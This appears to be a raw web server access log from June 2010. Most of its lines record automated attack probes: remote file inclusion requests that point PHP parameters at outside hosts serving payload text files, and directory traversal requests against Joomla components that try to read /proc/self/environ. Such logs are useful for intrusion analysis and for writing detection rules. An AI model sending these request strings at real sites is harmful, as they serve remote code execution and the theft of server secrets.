95.108.245.251 - - [23/Jun/2010:06:42:16 -0400] "GET /logs/error_log.Q110050100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
72.52.202.179 - - [23/Jun/2010:06:42:18 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:42:18 -0400] "GET //include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:42:18 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:42:19 -0400] "GET //include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:42:19 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:42:19 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:42:39 -0400] "GET /logs/error_log.Q109091600//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:42:40 -0400] "GET /logs/error_log.Q109091600//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
163.20.26.5 - - [23/Jun/2010:06:42:53 -0400] "GET /logs/error_log.Q110061400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:06:42:54 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:06:42:55 -0400] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
67.15.152.183 - - [23/Jun/2010:06:43:00 -0400] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
72.52.202.179 - - [23/Jun/2010:06:43:32 -0400] "GET /logs/error_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:43:34 -0400] "GET /logs/error_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.54.22.2 - - [23/Jun/2010:06:43:39 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
67.15.152.183 - - [23/Jun/2010:06:43:43 -0400] "GET /logs/access_log.Q110060700/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:06:43:43 -0400] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:06:43:43 -0400] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
163.20.26.5 - - [23/Jun/2010:06:43:53 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
67.15.152.183 - - [23/Jun/2010:06:44:00 -0400] "GET /logs/access_log.Q110060700/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
163.20.26.5 - - [23/Jun/2010:06:44:00 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
67.15.152.183 - - [23/Jun/2010:06:44:00 -0400] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:06:44:00 -0400] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
163.20.26.5 - - [23/Jun/2010:06:44:19 -0400] "GET /logs/error_log.Q110061400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:06:44:23 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
72.35.80.52 - - [23/Jun/2010:06:44:31 -0400] "GET /logs/access_log.Q110050600//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:44:39 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:44:43 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.15.152.183 - - [23/Jun/2010:06:44:44 -0400] "GET /logs/access_log.Q110053000/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
209.59.12.99 - - [23/Jun/2010:06:45:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.16.100.218 - - [23/Jun/2010:06:45:31 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:45:31 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:45:31 -0400] "GET /logs/access_log.Q109052200%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:45:32 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:45:32 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:45:32 -0400] "GET /logs/access_log.Q109052200//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
67.15.152.183 - - [23/Jun/2010:06:45:33 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
72.52.202.179 - - [23/Jun/2010:06:45:44 -0400] "GET /logs/error_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:45:44 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:45:44 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:06:45:45 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
72.52.202.179 - - [23/Jun/2010:06:45:45 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:06:45:45 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:45:46 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:45:47 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
72.52.202.179 - - [23/Jun/2010:06:45:49 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.52.202.179 - - [23/Jun/2010:06:45:49 -0400] "GET /logs/error_log.Q109100100%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.54.22.2 - - [23/Jun/2010:06:45:50 -0400] "GET /logs/access_log.Q110053000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:45:50 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:45:50 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.805"
74.55.240.242 - - [23/Jun/2010:06:46:01 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:46:04 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:46:06 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
163.20.26.5 - - [23/Jun/2010:06:46:08 -0400] "GET /logs/error_log.Q110061400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
72.52.202.179 - - [23/Jun/2010:06:46:09 -0400] "GET /logs/access_log.Q109121400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
163.20.26.5 - - [23/Jun/2010:06:46:09 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
72.52.202.179 - - [23/Jun/2010:06:46:09 -0400] "GET /logs/access_log.Q109121400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hg7370.hubweb.net//xe/files//zfxid1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:06:46:10 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
163.20.26.5 - - [23/Jun/2010:06:46:10 -0400] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
74.54.22.2 - - [23/Jun/2010:06:46:34 -0400] "GET /logs/access_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:46:34 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:46:34 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.805"
174.121.176.85 - - [23/Jun/2010:06:47:14 -0400] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
91.121.17.45 - - [23/Jun/2010:06:47:47 -0400] "GET ///////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
74.54.22.2 - - [23/Jun/2010:06:47:49 -0400] "GET /logs/access_log.Q110050800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:47:54 -0400] "GET /logs/error_log.Q110052600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:47:56 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:06:47:56 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55554 "-" "libwww-perl/5.805"
163.20.26.5 - - [23/Jun/2010:06:48:14 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
67.218.116.169 - - [23/Jun/2010:06:48:19 -0400] "GET /images/_notes/download_order_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
83.16.100.218 - - [23/Jun/2010:06:48:26 -0400] "GET /logs/access_log.Q109052200/rfi%20/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:06:48:36 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:48:36 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:48:36 -0400] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:48:37 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:48:37 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:48:37 -0400] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.836"
83.16.100.218 - - [23/Jun/2010:06:48:37 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:48:37 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:48:37 -0400] "GET /logs/access_log.Q109052200//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:48:39 -0400] "GET /rfi%20/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:48:39 -0400] "GET /logs/rfi%20/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:48:39 -0400] "GET /logs/access_log.Q109071900/rfi%20/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:06:48:40 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.836"
163.20.26.5 - - [23/Jun/2010:06:48:40 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
74.55.240.242 - - [23/Jun/2010:06:48:40 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:48:40 -0400] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.836"
72.14.193.1 - - [23/Jun/2010:06:48:38 -0400] "GET /logs/access_log.Q109051200 HTTP/1.1" 200 6040641 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp),gzip(gfe) (via docs.google.com/viewer)"
95.108.245.251 - - [23/Jun/2010:06:48:57 -0400] "GET /logs/error_log.Q109090500 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.209 - - [23/Jun/2010:06:49:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L02033C553BF429008090094+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.15.152.183 - - [23/Jun/2010:06:49:18 -0400] "GET /logs/access_log.Q110060700/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
74.55.240.242 - - [23/Jun/2010:06:49:18 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.836"
67.15.152.183 - - [23/Jun/2010:06:49:18 -0400] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
74.55.240.242 - - [23/Jun/2010:06:49:18 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
67.15.152.183 - - [23/Jun/2010:06:49:18 -0400] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
74.55.240.242 - - [23/Jun/2010:06:49:18 -0400] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:49:19 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:49:19 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:49:19 -0400] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.836"
83.16.100.218 - - [23/Jun/2010:06:49:27 -0400] "GET /logs/access_log.Q109071900%20%20/rfi%20/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:06:49:29 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:49:29 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
67.15.152.183 - - [23/Jun/2010:06:49:29 -0400] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
74.55.240.242 - - [23/Jun/2010:06:49:29 -0400] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:49:33 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:49:33 -0400] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:06:49:33 -0400] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.836"
114.108.151.149 - - [23/Jun/2010:06:50:05 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
83.16.100.218 - - [23/Jun/2010:06:50:14 -0400] "GET /logs/access_log.Q109052200%20%20/rfi%20/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
67.15.152.183 - - [23/Jun/2010:06:50:30 -0400] "GET /logs/access_log.Q110053000/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
83.16.100.218 - - [23/Jun/2010:06:50:40 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:50:40 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:50:40 -0400] "GET /logs/access_log.Q109062300%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
217.95.149.54 - - [23/Jun/2010:06:51:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; AskTB5.3)"
217.95.149.54 - - [23/Jun/2010:06:51:03 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; AskTB5.3)"
217.95.149.54 - - [23/Jun/2010:06:51:05 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; AskTB5.3)"
217.95.149.54 - - [23/Jun/2010:06:51:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; AskTB5.3)"
83.16.100.218 - - [23/Jun/2010:06:51:07 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:51:07 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:51:07 -0400] "GET /logs/access_log.Q109052200//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
91.121.17.45 - - [23/Jun/2010:06:51:08 -0400] "GET /logs/access_log.Q110060700///////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
91.121.17.45 - - [23/Jun/2010:06:51:09 -0400] "GET ///////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
